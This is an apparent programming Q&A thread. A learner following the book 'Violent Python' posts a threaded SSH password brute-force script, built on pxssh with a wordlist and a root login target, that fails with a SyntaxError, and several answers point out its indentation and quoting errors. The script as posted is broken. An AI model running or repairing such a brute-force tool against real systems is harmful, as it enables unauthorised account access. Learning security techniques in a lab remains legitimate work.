# Syntax Error which I can't seem to find

Tags: python

Okay so I'm using the Violent Python book and made an SSH brute force program. When I run the following code

```
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxconnections)
Found = False
Fails = 0

def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+} Paassword Found: ' + password
    Found = True
    except Exception, e:
        if 'read_nonblocking' in str(e):
        Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
    elif 'synchronize with original prompt' in str(e):
        time.sleep(1)
        connect9host, user, password, False)
    finally:
    if release: connection_lock.release()

def main():
    parser = optparse.OptionParser('usage%prog '+\
        '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string', \
        help= 'specify target host')
    parser.add_option('-u', dest='user', type='string', \
        help='specify the user')
    parser.add_option('-F', dest='psswdFile', type='string, \
        help='specify password file')
        (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.psswdFile
    user = options.user

    if host == None or psswdFile == None or user == None:
        print parser.usage
        exit(0)
    fn = open(psswdFile, 'r')
    for line in fn.readlines():
    if Found:
        print "[+] Exting: Password Found."
        exit(0)
        if Fails > 5
        print "[!] Exiting: Too many socket timeouts"
        exit(0)
    connection_lock.acquire()
        password = line.strip('\r').strip('\n')
    print "[-] Testing: "+str(password)
        t = Thread(target=connect, args+(host, user, \
            password, True))
        child = t.start()

if __name__ == '__main__':
    main()
```

and run it on terminal using the following command:

```
python brute_force_ssh_pxssh.py -H 10.10.1.36 -u root -F pass.txt
```

I get this error:

```
    File "brute_force_ssh_pxssh.py", line 17
    Found = True
        ^
SyntaxError: invalid syntax
```

I checked the sample code and it is written exactly lke this... Any help is greatly appreciated. (I am still a noob in Python). Thanks!

Comment: You seem to be missing a closing `'` as well.  Note where the SO syntax highlighting got confused.

Answer (score 0, accepted):

You have some problems with identation in various parts of the code

Other than line 17, it looks like you have an identation problem also on
line 20, line 23 (the elif block), line 27, line 38, and lines from 48 to 59 seems to be bad indented.

Also you have a missing ' on line 34 and an extra ) on line 25

Comment: Thank you much! Yeah I should use something other than just a plain text editor >_<

Answer (score 2):

The indentation is wrong. Should be

```
try:
    s = pxssh.pxssh()
    s.login(host, user, password)
    print '[+} Paassword Found: ' + password
    Found = True
except Exception, e:
    if 'read_nonblocking' in str(e):
        Fails += 1
```

Answer (score 2):

You `Found = True` should be indented.

```
try:
    s = pxssh.pxssh()
    s.login(host, user, password)
    print '[+} Paassword Found: ' + password
    Found = True
except Exception, e:
    if 'read_nonblocking' in str(e):
    Fails += 1
        time.sleep(5)
        connect(host, user, password, False)
```

Answer (score 1):

The indentation is valid. the Found = True should be more indent then  the try:

like this:

```
try:
    s = pxssh.pxssh()
    s.login(host, user, password)
    print '[+} Paassword Found: ' + password
    Found = True
except Exception, e:
```